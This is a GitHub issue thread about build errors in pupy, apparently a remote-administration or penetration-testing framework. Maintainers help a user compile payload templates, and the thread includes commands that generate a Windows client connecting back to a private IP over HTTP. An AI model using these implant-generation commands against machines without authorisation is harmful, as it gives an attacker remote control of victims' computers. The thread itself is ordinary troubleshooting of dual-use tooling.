### ISSUE TITLE
ValueError: Template not found (/pupy/payload_templates/pupyx64.dll)

### ISSUE THREAD

**Issue by ricko2991** [n1nj4sec/pupy#865]
hi, i'm stuck in payload templates. i create for windows target but failed with template not found

os: kali rolling
python: 2.7
docker 19.03.12

**Comment by xView60** [comment]
found fix?

**Comment by Akmaling** [comment]
run  ./build-docker-images.sh  it will solve the problem. old docker from https://github.com/alxchk/docker-old-tc

**Comment by ricko2991** [comment]
I run it like the one in the wiki guide. But I only run this command.
## docker installation
apt-get update && apt-get install curl -y
curl -fsSL https://get.docker.com > docker_installer.sh
chmod +x ./docker_installer.sh && ./docker_installer.sh

## docker compile for linux
cd client
./build-docker.sh linux64 sources-linux 

##then install the dependencies
apt-get install git libssl1.0-dev libffi-dev python-dev \
	python-pip build-essential swig tcpdump python-virtualenv

##and finally create-workspace.py (i use python2)
python create-workspace.py -NC -E docker pupyws

## run programs
pupyws/bin/pupysh
>>gen -f client -O windows -A x64 connect --host 10.0.2.15:1111 -t http
    ##error output
    [-] payload generation failed: Template not found (/pupy/payload_templates/pupyx64.exe)

can you help me where is my mistake I also do as you say and it's in the wiki guide. But I still can't install payload templates.

**Comment by ricko2991** [comment]
> run ./build-docker-images.sh it will solve the problem. old docker from https://github.com/alxchk/docker-old-tc

And how about https://github.com/alxchk/docker-old-tc. What can i do through this repository. I do not understand.

**Comment by alxchk** [comment]
Where did you get -NC argument? -NC means - do not compile templates. Does this exists somewhere in wiki?

**Comment by ricko2991** [comment]
sorry i don't see if there is a help command in create-workspace.py. I just noticed -C it didn't work and the alternative I used -NC. And I've found it and run it using the -C command for linux64 images.

**Comment by ricko2991** [comment]
I still get ValueError: Template not found (/pupy/payload_templates/pupyx64.exe). This is workspace installation i use:
##command
python create-workspace.py -C linux64 -E docker pupyws

am I wrong in entering the command?

**Comment by Akmaling** [comment]
I had same problem on Kali 2019,  what I did was  install Docker, since you were to able to run "python create-workspace.py -NC -E docker pupyws" and your installation worked, means your docker installation is good.


Please rerun   ./build-docker-images.sh again and check /pupy/pupy/payload_templates folder

**Comment by alxchk** [comment]
> I still get ValueError: Template not found (/pupy/payload_templates/pupyx64.exe). This is workspace installation i use:
> ##command
> python create-workspace.py -C linux64 -E docker pupyws
> 

You compiled template only for linux and generating client for windows

**Comment by ricko2991** [comment]
> > I still get ValueError: Template not found (/pupy/payload_templates/pupyx64.exe). This is workspace installation i use:
> > ##command
> > python create-workspace.py -C linux64 -E docker pupyws
> 
> You compiled template only for linux and generating client for windows

Can i compile template for linux, windows, and mac in one creation of create-workspace.py?

**Comment by alxchk** [comment]
Sure. But there is no client for mac.

-C linux32,linux64,windows

**Comment by ricko2991** [comment]
Thank you. i will try to install it. and hopefully there is no error.

**Comment by ricko2991** [comment]
Hi, i want to get the connection from the payload i made but i opened it in windows and no connection came. Are the commands I entered below suitable?
##command
gen -f client -O windows -A x64 connect --host 192.168.1.100:1111 -t http

##Screenshot
![Screenshot (43)](https://user-images.githubusercontent.com/67855001/92675801-cd923380-f352-11ea-886e-c179dc777472.png)

**Comment by ricko2991** [comment]
Hi, i want to get the connection from the payload i made but i opened it in windows and no connection came. Are the commands I entered below suitable?
##command
gen -f client -O windows -A x64 connect --host 192.168.43.34:8080 -t http

##Screenshot
![Screenshot (44)](https://user-images.githubusercontent.com/67855001/92677411-61b1ca00-f356-11ea-9958-c28254281d4b.png)

**Comment by alxchk** [comment]
You can generate client with --debug (as well as pupysh). Then run client from cmd.exe. Or redirect stdout to file. It will be clear what is not ok

**Comment by ricko2991** [comment]
This is the error i found. can you ask me what to do with a message like this.

![Screenshot (45)](https://user-images.githubusercontent.com/67855001/92711575-3b5a5180-f38b-11ea-8aeb-dd45e06e5077.png)

**Comment by alxchk** [comment]
Looks like either some issue with http transport or data corruption. Will look into this. Meanwhile try some other transports. ec4 for example
